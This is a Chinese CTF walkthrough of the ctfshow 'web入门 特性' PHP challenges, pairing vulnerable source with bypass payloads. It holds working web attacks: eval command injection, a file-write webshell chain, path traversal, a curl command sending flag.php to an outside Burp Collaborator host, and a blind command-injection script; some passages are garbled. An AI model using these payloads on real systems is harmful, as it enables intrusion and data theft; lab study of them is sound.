ctfshow web入门 特性
Web89
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);if(isset($_GET['num'])){$num = $_GET['num'];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}
}
preg_match()无法处理数组
payload:?num[]=1
Web90
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==="4476"){die("no no no!");}if(intval($num,0)===4476){echo $flag;}else{echo intval($num,0);}
}
intval会把字母舍弃掉
payload1:?num=4476x
intval($num,0)
是将$num十进制输出,我们传入16进制的4476会被转换成10进制
payload:?num=0x117c
Web91
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:16:09
# @link: https://ctfer.com*/show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){if(preg_match('/^php$/i', $a)){echo 'hacker';}else{echo $flag;}
}
else{echo 'nonononono';
}
第一个判断:以php开头,以php结尾
/i :大小写
/m :多行匹配
如果使用%0aphp 进行换行
第一个多行匹配会匹配到php,而第二个没有多行匹配,则什么也匹配不到
Web92
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:29:30
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(intval($num,0)==4476){echo $flag;}else{echo intval($num,0);}
}
传入16进制 0x117c
Web93
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:32:58
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(preg_match("/[a-z]/i", $num)){die("no no no!");}if(intval($num,0)==4476){echo $flag;}else{echo intval($num,0);}
}
过虑字母,不能使用16进制
0bsss:二进制 0sss:八进制 0xsss:16进制
题目中的是0,为8进制
将4476转换为八进制
payload:?num=010574
或使用小数点:4476.123
Web94
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:46:19
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==="4476"){die("no no no!");}if(preg_match("/[a-z]/i", $num)){die("no no no!");}if(!strpos($num, "0")){die("no no no!");}if(intval($num,0)===4476){echo $flag;}
}
使用strpos()过虑了开头的0,所以不能使用八进制
可以使用小数点4476.0
intval()遇到小数点会编程int型
Web95
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(preg_match("/[a-z]|\./i", $num)){die("no no no!!");}if(!strpos($num, "0")){die("no no no!!!");}if(intval($num,0)===4476){echo $flag;}
}
过虑了 .
+010574 会被认为 010574 同时第一个字符不是0 符合条件
Web96
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com*/highlight_file(__FILE__);if(isset($_GET['u'])){if($_GET['u']=='flag.php'){die("no no no");}else{highlight_file($_GET['u']);}}
payload:c=./flag.php
Web97
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:36:32
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>
md5弱类型即可
payload:a[]=1&b[]=2
Web98
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com*/include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);?>
此题考察三元运算
如果有get请求就转换成post请求
如果get请求flag等于flag就转换成$_COOKIE
如果get请求flag等于flag就转换成$_SERVER
如果get请求http_flag等于flag,就读取flag
重点在第一和第四,先get请求flag随便一个值,然后post请求HTTP_FLAG=flag
这样就可以满足条件
Web99
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com*/highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){file_put_contents($_GET['n'], $_POST['content']);
}?>
allow=array();定义一个数组循环添加到数组isset(allow = array(); 定义一个数组 循环 添加到数组 isset(allow=array();定义一个数组循环添加到数组isset(_GET[‘n’]) && in_array($_GET[‘n’], allow)n存在并且在allow数组里fileputcontents(allow) n存在并且在allow数组里 file_put_contents(allow)n存在并且在allow数组里fileputcontents(_GET[‘n’], $_POST[‘content’]); 写入文件
post传入一句话
in_array():有漏洞,没有设置第三个参数,默认转换成33
使用蚁剑连接获得flag
Web100
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com*/highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){if(!preg_match("/\;/", $v2)){if(preg_match("/\;/", $v3)){eval("$v2('ctfshow')$v3");}}}?>
注意:v0=isnumeric(v0=is_numeric(v0=isnumeric(v1) and is_numeric(v2)andisnumeric(v2) and is_numeric(v2)andisnumeric(v3);
只要v1为数字 就为true ,就可以绕过第一个if判断
payload:v1=2&v2=echo&v3=;system(‘tac ctfshow.php’);
0x2d 转换为-
flag:ctfshow{8605e17f-7bb6-4e48-b604-4c213947dbdc}
Web101
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-22 00:26:48
# @link: https://ctfer.com*/highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){eval("$v2('ctfshow')$v3");}}}?>
过虑了特殊符号,不能使用getshell
使用反射类,将其输出
payload:?v1=2&v2=echo new ReflectionClass&v3=;
获得flag:b15c2f610x2d49090x2d42b00x2d97e50x2dc00dfea37e1
将0x2d转换成-:b15c2f61-4909-42b0-97e5-c00dfea37e1
提交flag不对…
正确的flag37位 我们的flag36位
少了一位,挨个猜
正确flag:b15c2f61-4909-42b0-97e5-c00dfea37e17
Web102
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-23 20:59:43*/highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;file_put_contents($v3,$str);
}
else{die('hacker');
}?>
call_user_func():把参数回到函数的参数
file_out_contents():写入文件,可以使用php伪协议
v2必须是数字 v3不需要 v1也不需要
给v2传入16进制:115044383959474e6864434171594473,前两位是绕过substr()的
5044383959474e6864434171594473解码为:PD89YGNhdCAqYDs
PD89YGNhdCAqYDs base64解码为:<?=cat *
;
v2=115044383959474e6864434171594473
v1=hex2bin 进行16进制转换
v3=php://filter/write=convert.base64-decode/resource=qqq.php
使用伪协议将16进制转换后的base64写入到1.php中 并解析执行
然后访问qqq.php,查看源代码获得flag
Web103
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-23 21:03:24*/highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;if(!preg_match("/.*p.*h.*p.*/i",$str)){file_put_contents($v3,$str);}else{die('Sorry');}
}
else{die('hacker');
}?>
对str进行了过虑,无伤大雅
方法同Web102
Web104(hash缺失比较)
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:27:20*/highlight_file(__FILE__);
include("flag.php");if(isset($_POST['v1']) && isset($_GET['v2'])){$v1 = $_POST['v1'];$v2 = $_GET['v2'];if(sha1($v1)==sha1($v2)){echo $flag;}
}?>
方法同md5,都无法处理数组,或者为0e开头
Web105(变量覆盖)
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:34:07*/highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){if($key==='error'){die("what are you doing?!");}$$key=$$value;
}foreach($_POST as $key => $value){if($value==='flag'){die("what are you doing?!");}$$key=$$value;
}
if(!($_POST['flag']==$flag)){die($error);
}
echo "your are good".$flag."\n";
die($suces);?>
第一个foreach 传入的get变量名不能为error
第二个foreach 传入的post变量值不能为flag
if判断如果传入的!(flag==变量flag) 输出error
get传入suces=flag
在第二个foreach之前完成变量覆盖
post传入error=suces
通过两个foerach和判断,获得flag
Web106(hash缺失比较)
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:38:27*/highlight_file(__FILE__);
include("flag.php");if(isset($_POST['v1']) && isset($_GET['v2'])){$v1 = $_POST['v1'];$v2 = $_GET['v2'];if(sha1($v1)==sha1($v2) && $v1!=$v2){echo $flag;}
}?>
Web107
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:24:14*/highlight_file(__FILE__);
error_reporting(0);
include("flag.php");if(isset($_POST['v1'])){$v1 = $_POST['v1'];$v3 = $_GET['v3'];parse_str($v1,$v2);if($v2['flag']==md5($v3)){echo $flag;}}?>
parse_str():将字符串解析到数组中
第一个参数:字符串 第二个参数:数组名
md5加密数组的时候是无法加密的 为null
只需要给flag=空即可,
Web108
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:53:55*/highlight_file(__FILE__);
error_reporting(0);
include("flag.php");if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {die('error');}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){echo $flag;
}?>error
ereg():指定匹配字符
strrev():反向输出
erge()存在null截断漏洞,可以使用%00进行绕过
0x36d的10进制为877,反转过来778
payload:?c=a%00778
Web109
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:02:34*/highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){$v1 = $_GET['v1'];$v2 = $_GET['v2'];if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){eval("echo new $v1($v2());");}}?>
异常类&&反射类
payload:?v1=ReflectionClass&v2=system(‘cat fl36dg.txt’) 或 Exception
?v1=Exception&v2=system(‘ls’)
Web110
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:49:10*/highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){$v1 = $_GET['v1'];$v2 = $_GET['v2'];if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){die("error v1");}if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){die("error v2");}eval("echo new $v1($v2());");}?>
使用内置函数获取文件
FilesystemIterator() 默认的tostring是输出目录的第一个文件
getcwd()获取当前目录
payload:?v1=FilesystemIterator&v2=getcwd
获得flag文件,因为flag文件在web目录下,所以直接访问获得flag
Web111
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 02:41:40*/highlight_file(__FILE__);
error_reporting(0);
include("flag.php");function getFlag(&$v1,&$v2){eval("$$v1 = &$$v2;");var_dump($$v1);
}if(isset($_GET['v1']) && isset($_GET['v2'])){$v1 = $_GET['v1'];$v2 = $_GET['v2'];if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){die("error v1");}if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){die("error v2");}if(preg_match('/ctfshow/', $v1)){getFlag($v1,$v2);}
}?>
考察 php超全局变量 $GLOBALS
$GLOBALS------引用全局作用域中可用的全部变量
例:
定义的两个变量都被输出
将v1赋值ctfshow满足,这两个判断
然后v2赋值GLOBALS 满足判断
条件都满足执行getFlag,将v2的值赋给v1,输出所有变量和变量内容
payload:?v1=ctfshow&v2=GLOBALS
Web112
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:49*/highlight_file(__FILE__);
error_reporting(0);
function filter($file){if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){die("hacker!");}else{return $file;}
}
$file=$_GET['file'];
if(! is_file($file)){highlight_file(filter($file));
}else{echo "hacker!";
}
is_file():检查文件是否是正常文件
使用php伪协议
payload:?file=php://filter/resource=flag.php
Web113
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:52*/highlight_file(__FILE__);
error_reporting(0);
function filter($file){if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){die('hacker!');}else{return $file;}
}
$file=$_GET['file'];
if(! is_file($file)){highlight_file(filter($file));
}else{echo "hacker!";
}
过虑了filter就不能使用php伪协议了
使用zlib://伪协议
payload:?file=compress.zlib://flag.php
Web114
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:02:53*/error_reporting(0);
highlight_file(__FILE__);
function filter($file){if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){die('hacker!');}else{return $file;}
}
$file=$_GET['file'];
echo "师傅们居然tql都是非预期 哼!";
if(! is_file($file)){highlight_file(filter($file));
}else{echo "hacker!";
}
没有过虑filter,使用php伪协议
payload:php://filter/resource=flag.php
Web115
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:08:19*/include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){$num=str_replace("0x","1",$num);$num=str_replace("0","1",$num);$num=str_replace(".","1",$num);$num=str_replace("e","1",$num);$num=str_replace("+","1",$num);return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){if($num=='36'){echo $flag;}else{echo "hacker!!";}
}else{echo "hacker!!!";
}hacker!!!
trim():移除变量两边的空格
is_numeric():在前面加上空格会被认为是数字
trim():会过虑掉\n \r \t \v \0 但是不会过虑\f
将\f转换为url %0c
payload:%0c36
Web123
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){eval("$c".";"); if($fl0g==="flag_give_me"){echo $flag;}}
}
?>
php变量名只有数字字母下划线,如果是空格 + [ . 会自动替换成_
但是一个变量名只能替换一处
所以把CTF_SHOW.COM写成CTF[SHOW.COM
这样就会替换[换成_ 而 . 是不变的
如果过了第二个判断,就会eval代码执行,这样就可以直接给fun赋值echo $flag
获得flag
Web125
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){eval("$c".";");if($fl0g==="flag_give_me"){echo $flag;}}
}
?>
过虑了echo不能直接输出了
可以使用覆盖fl0g使其满足条件即可
extract($_POST)进行post覆盖
Web126
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){eval("$c".";");if($fl0g==="flag_give_me"){echo $flag;}}
}
?>
因为$_SERVER的存在,get传入赋值语句,接着在post中执行赋值语句就可以
get:?$fl0g=flag_give_me;
post:CTF_SHOW=1&CTF[SHOW.COM=1&fun=eval($a[0])
Web127
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-10 21:52:49*/error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];//特殊字符检测
function waf($url){if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){return true;}else{return false;}
}if(waf($url)){die("嗯哼?");
}else{extract($_GET);
}if($ctf_show==='ilove36d'){echo $flag;
}
$url = $_SERVER[‘QUERY_STRING’]; 获取传入的字符串
extract($_GET); 进行变量覆盖
传入ctf_show=ilove36d,即可获得flag
但是过虑了_ 并没有过虑空格 这样可以使用空格代替_
php中变量有空格 + [ . 会自动替换成_
payload:?ctf show=ilove36d
Web128
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-12 19:49:05*/error_reporting(0);
include("flag.php");
highlight_file(__FILE__);$f1 = $_GET['f1'];
$f2 = $_GET['f2'];if(check($f1)){var_dump(call_user_func(call_user_func($f1,$f2)));
}else{echo "嗯哼?";
}function check($str){return !preg_match('/[0-9]|[a-z]/i', $str);
}NULL
gettext():实现程序的国际化
echo gettext(123); ~= echo 123;
_():是gettex()的缩写
get_defined_vars():返回由所有已定义变量所组成的数组
f1=_ 满足套件
f2 = get_defined_vars 将返回的数组当作f1的参数
payload:get_defined_vars
获得flag
Web129
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 03:18:40*/error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){$f = $_GET['f'];if(stripos($f, 'ctfshow')>0){echo readfile($f);}
}
stripos():查询字符串首次出现的位置
readfile():输出文件
ctfshow的位置不能在前面
目录穿越
pyaload:?f=/ctfshow/…/…/…/…/…/…/var/www/html/flag.php
查看源代码获得flag
Web130
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40*/error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){$f = $_POST['f'];if(preg_match('/.+?ctfshow/is', $f)){die('bye!');}if(stripos($f, 'ctfshow') === FALSE){die('bye!!');}echo $flag;}
payload:?f=ctfshow
绕过正则即可
Web131(正则匹配溢出)
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40*/error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){$f = (String)$_POST['f'];if(preg_match('/.+?ctfshow/is', $f)){die('bye!');}if(stripos($f,'36Dctfshow') === FALSE){die('bye!!');}echo $flag;}
php中正则表达式匹配是由一定限制的,如果超过一定限制,则返回false
生成25万长度的字符串
给f进行post传值,获得flag
Web132(考察&&和||运算符应用)
扫描得到/admin
访问获得源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 06:22:13
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 20:05:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/#error_reporting(0);
include("flag.php");
highlight_file(__FILE__);if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){$username = (String)$_GET['username'];$password = (String)$_GET['password'];$code = (String)$_GET['code'];if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){if($code == 'admin'){echo $flag;}}
}
第二个判断只要username=admin即可符合
使code=admin获得flag
password随便即可
payload:?username=admin&password=flag&code=admin
Web133
参考:https://blog.csdn.net/qq_46091464/article/details/109095382
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 16:43:44*/error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){eval(substr($F,0,6));}else{die("6个字母都还不够呀?!");}
}
套娃命令执行
?F=$F
; sleep 5
``是shell_exec的缩写
可以发现执行了sleep5
虽然可以命令执行 但是不能带出
使用curl -F + burp的Collaborator Client插件
payload:?F=$F
; curl -X POST -F xx=@flag.php 6mtyo3lfs82ed24inzaj1tn7uy0ood.burpcollaborator.net
Web134
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-14 23:01:06*/highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {die(file_get_contents('flag.php'));
}
考察变量覆盖
利用extract(POST)进行_POST)进行POST)进行_PSOT解析,将get请求解析成变量
pyaload:? _POST[key1]=36d&_POST[key2]=36d
Web135
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03*/error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){eval(substr($F,0,6));}else{die("师傅们居然破解了前面的,那就来一个加强版吧");}
}
linux tee:将输出的结果保存到文件中
使用tee可以解决exec执行的结果不输出的问题
执行,然后访问ls
下载文件,查看
然后,访问111
获得flag
Web137
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 22:27:49*/error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{function __wakeup(){die("private class");}static function getFlag(){echo file_get_contents("flag.php");}
}call_user_func($_POST['ctfshow']);
类的使用
Web138
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 22:52:13*/error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{function __wakeup(){die("private class");}static function getFlag(){echo file_get_contents("flag.php");}
}if(strripos($_POST['ctfshow'], ":")>-1){die("private function");
}call_user_func($_POST['ctfshow']);
不能使用:
但是call_user_func():支持传入数组的形式
Web139
源码:
<?php
error_reporting(0);
function check($x){if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){die('too young too simple sometimes naive!');}
}
if(isset($_GET['c'])){$c=$_GET['c'];check($c);exec($c);
}
else{highlight_file(__FILE__);
}
?>
没有写入权限
利用shell编程的if判断语句配合awk以及cut来获得falg
awk NR参数指定第几行
awk获取逐行数据
cut逐列获得单个字符
使用ls \查看根目录的文件
python:
# -*- codeing = utf-8 -*-
# @Time : 2021/7/16 10:23
# @Author : CC
# @Software: PyCharm
import requests
import threading
url = 'http://35f22f85-52fb-41fa-bf20-132a7bcb033e.challenge.ctf.show:8080/'
def getflag():result = ""for i in range(1,5):for j in range(1,15):for k in range(32,128): #ascii码表k = chr(k)payload = "?c=" + f"if [ `ls / | awk NR=={i} | cut -c {j}` == {k} ];then sleep 2;fi"try:requests.get(url=url+payload,timeout=(1.5,1.5))except:result += kprint(result)breakresult += " "
if __name__ == '__main__':t = threading.Thread(target=getflag(),)t.start()
获得flag文件
查看文件,获得flag
Web140
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 12:39:25*/error_reporting(0);
highlight_file(__FILE__);
